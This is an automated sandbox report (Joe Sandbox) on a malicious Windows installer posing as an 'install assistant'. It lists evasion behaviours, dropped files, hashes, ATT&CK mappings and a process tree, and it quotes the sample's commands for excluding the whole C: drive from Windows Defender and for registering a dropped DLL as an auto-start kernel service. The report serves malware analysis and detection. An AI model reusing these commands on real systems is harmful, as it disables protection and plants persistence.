Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (32 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9BB430 FindFirstFileA,FindClose,FindClose,
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA9C60 GetSystemInfo,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C843886 NtSetInformationThread 00000000,00000011,00000000,00000000
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Thread information set: HideFromDebugger (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9D06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9CF6ED mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9DA2A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9DA2D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9D06F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9C922D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (2 identical entries)
Source: tProtect.dll.12.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (31 identical entries)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E40320 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DAAB2A GetSystemTimeAsFileTime,
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E40090 GetVersion,
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000002.2242652652.00000000016F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
MITRE ATT&CK Matrix (listed by tactic column; a leading number is the hit-count badge exactly as shown in the matrix, unnumbered entries are the matrix's default techniques)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Command and Scripting Interpreter; 1 Service Execution; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 43 Security Software Discovery; 231 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; 3 File and Directory Discovery; 25 System Information Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1580396; Sample: #U5b89#U88c5#U52a9#U624b2.0.7.exe; Startdate: 24/12/2024; Architecture: WINDOWS; Score: 88

Signatures attached to the root node: Multi AV Scanner detection for dropped file; Found driver which could be used to inject code into processes; PE file contains section with special chars; 2 other signatures.

Process tree recovered from the graph (dropped files and signatures listed under the process they belong to):

  • #U5b89#U88c5#U52a9#U624b2.0.7.exe (started from the root)
    • dropped: C:\...\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, PE32
    • started: #U5b89#U88c5#U52a9#U624b2.0.7.tmp
      • dropped: C:\Users\user\AppData\Local\...\update.vac, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
      • signature: Adds a directory exclusion to Windows Defender
      • started: powershell.exe (signature: Loading BitLocker PowerShell Module; started conhost.exe and WmiPrvSE.exe)
      • started: #U5b89#U88c5#U52a9#U624b2.0.7.exe (second instance)
        • dropped: C:\...\#U5b89#U88c5#U52a9#U624b2.0.7.tmp, PE32
        • started: #U5b89#U88c5#U52a9#U624b2.0.7.tmp (second instance)
          • dropped: C:\Users\user\AppData\Local\...\update.vac, PE32; C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32; C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Program Files (x86)\Windows NT\7zr.exe, PE32
          • signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
          • started: 7zr.exe (dropped C:\Program Files (x86)\...\tProtect.dll, PE32+; started conhost.exe)
          • started: 7zr.exe (second instance; started conhost.exe)
          • started: cmd.exe (started sc.exe, which started conhost.exe)
  • cmd.exe (started from the root) → sc.exe → conhost.exe
  • cmd.exe (started from the root) → sc.exe → conhost.exe
  • 30 other processes (started from the root) → sc.exe (three instances, each starting conhost.exe) and 26 other processes (→ conhost.exe and 25 other processes)
Source | Detection | Scanner | Label | Link
#U5b89#U88c5#U52a9#U624b2.0.7.exe | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 24% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vac | 24% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vac | 24% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b2.0.7.exe | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007ECFB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000001.00000000.2067287826.0000000000A21000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp, 00000006.00000000.2087886960.000000000117D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | false | | high
No contacted IP infos

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580396
Start date and time: 2024-12-24 13:02:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b2.0.7.exe
renamed because original name is a hash value
Original Sample Name: 2.0.7.exe
Detection: MAL
Classification: mal88.evad.winEXE@125/33@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 28
• Number of non-executed functions: 77
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: #U5b89#U88c5#U52a9#U624b2.0.7.exe

Time | Type | Description
07:03:08 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b2.0.7.tmp modified
07:03:11 | API Interceptor | 23x Sleep call for process: powershell.exe modified
No context
No context
No context
No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.4.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.5.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.2.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.3.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b2.0.1.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | cVyexkZjrG.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | cVyexkZjrG.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.3.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.1.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b2.0.4.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.3.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b2.0.1.exe, Detection: malicious
• Filename: cVyexkZjrG.exe, Detection: malicious
• Filename: cVyexkZjrG.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b1.0.3.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: data
Category: dropped
Size (bytes): 2631665
Entropy (8bit): 7.999930027122203
Encrypted: true
SSDEEP: 49152:RckL5jn8TsLA33HdXwSluhXMQKjGmKkxT+jK7VFLcdg/0asbhZ9:R9L5bisLU3HdXbluW2k16mFkpdn
MD5: 54CD10D2DC5A0C14D6D597D57D6EBDBE
SHA1: 642DA4A9958EADCBC7FC3B338EFD933CA7982C89
SHA-256: 3A1F4EA0988B53F28F47CD4827EA9A8D9B12F722BAA9307276C0A6AE4F7649C8
SHA-512: 9FE76DA4769F27C9B123C9AF9805B15BA4B56ABDEE1B12BA423E4F5D5345A4ECB51F86C6D139FB78B4100A0A00C289A7D1F4D973DEB6E4A2D13FA1640707AD3F
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3606016
Entropy (8bit): 7.0063494494702985
Encrypted: false
SSDEEP: 49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
MD5: 95ACD5631A9131DB1FD066565AFC9A67
SHA1: 8E9473BD632FF0F57FC34EECAC17174341D80D94
SHA-256: EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
SHA-512: 70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 24%
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: data
Category: dropped
Size (bytes): 2381502
Entropy (8bit): 7.999925361527667
Encrypted: true
SSDEEP: 49152:jy256EiA8xG5zSjVi8PdH5lP0fc2k5UASQ/oFY/vyJHDNruHBsOvW:jyIrB8xG58fH5lP0l6XUNrWC
MD5: 688183445140DA0F13690A143C57A42F
SHA1: 01DF7279FA87C87733E93BF7B3DA05CF2ECF6490
SHA-256: 8F0464EC2A7320ED2B11972E642AA490423857277E2BEB87B8C4DBDDA467894A
SHA-512: 2C01BC07A0FED5FA6516DFDE36B2574620D1DC03D20B5814B467E38519EAC0EE82D403A94BD6D2966ED8713E9ABE26A1A00925805B1793ECD23621BA85045FD7
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: data
Category: dropped
Size (bytes): 2631665
Entropy (8bit): 7.999930027122203
Encrypted: true
SSDEEP: 49152:RckL5jn8TsLA33HdXwSluhXMQKjGmKkxT+jK7VFLcdg/0asbhZ9:R9L5bisLU3HdXbluW2k16mFkpdn
MD5: 54CD10D2DC5A0C14D6D597D57D6EBDBE
SHA1: 642DA4A9958EADCBC7FC3B338EFD933CA7982C89
SHA-256: 3A1F4EA0988B53F28F47CD4827EA9A8D9B12F722BAA9307276C0A6AE4F7649C8
SHA-512: 9FE76DA4769F27C9B123C9AF9805B15BA4B56ABDEE1B12BA423E4F5D5345A4ECB51F86C6D139FB78B4100A0A00C289A7D1F4D973DEB6E4A2D13FA1640707AD3F
Malicious: false
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996932542816659
Encrypted: true
SSDEEP: 1536:pgyiqyZS4P3hjTwJQkzCOiHyz11vMAotM:pgy2Se3hjTkzCoz11UAD
MD5: A0116399A576270821667DC52ED268A1
SHA1: F1D8E6AD0F646F28DAFC11CFC675F6DEB7879A87
SHA-256: 74031DBC394941069E35F10B0E11CC231BBBCE4E8A2C5ACC7D7DC222DE2AA4CC
SHA-512: C5BB615D7E236C0A89543087BB944DFFBA15D7CDB982FC64E66165720CCA55D470B4FFE9ECED64E52D66A7FECD0965619D7DBBD53D33D488467319847391496E
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.9969325428166576
Encrypted: true
SSDEEP: 1536:F9gH2nMO3Vhm1+kHCChICGLEoDFUHypSjtz8UQfH:8WnMKVhS+OkDFmycJz8RH
MD5: 66B4020758023C8D7B0A20F8280ECE96
SHA1: 4B4F9898B71061E7C4228E28756F3F83AB8A41AB
SHA-256: 031EDECE090542D31C84BC15D2408347D794F06581C102E1A42F014E71FA5027
SHA-512: EE1EFF4030B9B96DAA077D49058169456F11B4A672BE3CF96B0E6670C9E68BA50439914B74CA976999F34F93B471BF2A7A69AA25303483C82E176038B17FF44E
Malicious: false
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996966859255975
Encrypted: true
SSDEEP: 1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5: CEA69F993E1CE0FB945A98BF37A66546
SHA1: 7114365265F041DA904574D1F5876544506F89BA
SHA-256: E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512: 4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996966859255979
Encrypted: true
SSDEEP: 1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
MD5: 4CB8B7E557C80FC7B014133AB834A042
SHA1: C42E2C861FF3ED0E6A11824E12F67A344E8F783D
SHA-256: 3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
SHA-512: A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
Malicious: false
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 31890
Entropy (8bit): 7.99402458740637
Encrypted: true
SSDEEP: 768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
MD5: 8622FC7228777F64A47BD6C61478ADD9
SHA1: 9A7C15F341835F83C96DA804DC1E21FDA696BB56
SHA-256: 4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
SHA-512: 71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 31890
Entropy (8bit): 7.99402458740637
Encrypted: true
SSDEEP: 768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
MD5: CE6034AFC63BB42F4E0D6CD897DFBCB8
SHA1: 49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
SHA-256: 7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
SHA-512: 7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
Malicious: false
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 74960
Entropy (8bit): 7.99759370165655
Encrypted: true
SSDEEP: 1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
MD5: 950338D50B95A25F494EE74E97B7B7A9
SHA1: F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
SHA-256: 87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
